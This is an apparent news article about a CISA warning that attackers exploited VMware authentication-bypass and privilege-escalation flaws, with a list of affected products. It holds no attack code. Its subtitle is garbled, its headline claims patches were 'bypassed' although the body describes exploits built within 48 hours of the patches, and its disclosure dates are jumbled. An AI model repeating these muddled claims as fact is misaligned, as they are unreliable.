Skip to content
CybersecurityTechnology

Vulnerabilities in VMware systems reappear as threat actors successfully bypass patch updates within a 48-hour period.

Persisting Concern: CISA believes cyber threat actors will likely detach themselves from recent solutions, undermining the effectiveness of new patches.

 and  Administrator
2 min read
Reactivated VMware weaknesses emerge following hackers' evasion of patches within two days
Reactivated VMware weaknesses emerge following hackers' evasion of patches within two days

Vulnerabilities in VMware systems reappear as threat actors successfully bypass patch updates within a 48-hour period.

Breaking News: Multiple VMware Vulnerabilities Compromised by Threat Actors

The Cybersecurity and Infrastructure Security Agency (CISA) has confirmed two significant compromises of VMware vulnerabilities that were disclosed in April. These compromises, initiated by multiple threat actors, have been causing concern for organizations using affected VMware products, particularly those that are accessible online.

Since June 2, 2022, numerous organizations have been targeted by threat actors exploiting these vulnerabilities. Although the specific names of these organizations have not been detailed in the available sources, CISA urges all affected enterprises to assume they've been compromised and initiate thorough threat-hunting activities.

The authentication bypass vulnerability, CVE-2022-22972, has a severity score of 9.8, while the local privilege escalation vulnerability, CVE-2022-22973, has a score of 7.8. These vulnerabilities, disclosed by VMware on May 18, are expected to be quickly exploited by malicious cyber actors.

Threat actors outmaneuvered VMware's previous patches and developed an exploit within 48 hours, according to CISA. As a result, enterprises or government agencies that detect a potential compromise are advised to follow incident response guidance detailed in CISA's cybersecurity advisory.

One of the most notable incidents occurred in January 2022, when threat actors installed Cobalt Strike implants in multiple VMware Horizon servers. Additionally, threat actors exploited Log4Shell vulnerabilities in VMware Horizon to create web shells in the same month.

In response to these threats, CISA has encouraged enterprises to reference the updated details to search for signs of post-exploitation activities and report incidents to them. They have also directed all 101 federal civilian executive branch agencies to identify all instances of the affected VMware products and either deploy a pair of patches that VMware released in a security advisory on Wednesday or remove the instances from their networks.

Impacted VMware products include Workspace ONE Access, Identity Manager, vRealize Automation, Cloud Foundation, vRealize Suite Lifecycle Manager, NSX, vRealize Operations, vRealize Log Insight, and vRealize Network Insight.

This is the latest in an ongoing security saga for VMware, a vendor that threat actors have prodded frequently in the last year. Organizations using affected VMware products are urged to stay vigilant and proactive in their security measures.

Read also:

Related

Latest